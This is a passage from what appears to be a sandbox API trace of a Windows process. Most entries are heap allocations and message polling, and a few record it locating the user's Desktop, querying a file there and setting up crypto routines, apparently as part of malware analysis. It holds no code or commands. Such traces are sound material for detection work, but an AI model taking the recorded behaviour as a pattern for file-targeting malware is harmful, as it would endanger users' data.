dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0189.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0189.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0189.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0189.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0189.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0189.471] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0189.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0189.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0189.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0189.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0189.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0189.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0189.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0189.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0189.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0189.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0189.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0189.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0189.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0189.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e538c0 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0189.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0189.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0189.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0189.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0189.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0189.474] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0189.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0189.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0189.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0189.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0189.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0189.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0189.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0189.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0189.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0189.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0189.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0189.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0189.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.476] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0189.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0189.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0189.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0189.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0189.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0189.477] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0189.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0189.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0189.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0189.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0189.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0189.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.478] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/mpe9Fe1_ci-oIpS.flv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4adb750, ftCreationTime.dwHighDateTime=0x1d5f10a, ftLastAccessTime.dwLowDateTime=0xaa9de740, ftLastAccessTime.dwHighDateTime=0x1d5e668, ftLastWriteTime.dwLowDateTime=0xaa9de740, ftLastWriteTime.dwHighDateTime=0x1d5e668, nFileSizeHigh=0x0, nFileSizeLow=0x106d7, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="mpe9Fe1_ci-oIpS.flv", cAlternateFileName="MPE9FE~1.FLV")) returned 0xa86f90 [0189.478] FindClose (in: hFindFile=0xa86f90 | out: hFindFile=0xa86f90) returned 1 [0189.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0189.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0189.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.479] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0189.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0189.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0189.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0189.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0189.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0189.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0189.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0189.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.480] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0189.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0189.480] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0189.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0189.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0189.480] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0189.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0189.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.480] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0189.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0189.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0189.480] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0189.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0189.481] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.482] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0189.482] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0189.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0189.482] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0189.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0189.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0189.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0189.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.483] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, 